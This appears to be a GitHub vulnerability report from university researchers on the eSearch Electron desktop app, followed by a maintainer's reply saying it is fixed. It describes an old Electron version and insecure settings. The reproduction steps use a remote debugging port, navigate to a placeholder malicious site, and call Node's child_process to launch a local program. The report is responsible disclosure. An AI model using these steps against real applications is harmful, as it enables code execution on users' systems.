The eSearch Desktop Application uses an old version of Electron, insecure web preferences, and does not restrict in-app navigation.

[masood]

Summary:

The eSearch Desktop Application uses an old version of Electron, insecure web preferences, and does not restrict in-app navigation.

Platform(s) Affected:

MacOS, Windows, Linux

Steps To Reproduce:

1. Open the eSearch Desktop Application from the command-line. Add a command-line switch --remote-debugging-port=8315 while running the application.
2. Open a web browser on the same device and visit localhost:8315. The application can be interacted with via the DevTools protocol.
3. [Navigate to Malicious Site] Within the address bar, update the location, to say, `window.open = “https://malicious.com”. This site loaded within the renderer process now has access to Node.js libraries.
4. [Access Node.js Libraries] Within the console, execute require(‘child_process’).execFile(‘/Applications/Emacs.app/Contents/MacOS/Emacs’”) – observe that, if installed on the system, the Emacs opens. Essentially, any malicious code that runs in the renderer process can compromise the user’s underlying system.

[Electron.js Version] The eSearch Desktop Application uses an older version of Electron. The framework recommends that updated versions of the framework be used to take advantage of secure defaults and security fixes. [Link]

–

Mir Masood Ali, PhD student, University of Illinois at Chicago Mohammad Ghasemisharif, PhD Candidate, University of Illinois at Chicago Chris Kanich, Associate Professor, University of Illinois at Chicago Jason Polakis, Associate Professor, University of Illinois at Chicago

[xushengfeng]

i have fixed it in code d249acfe1e595b51bb3716c47f205b9170102d48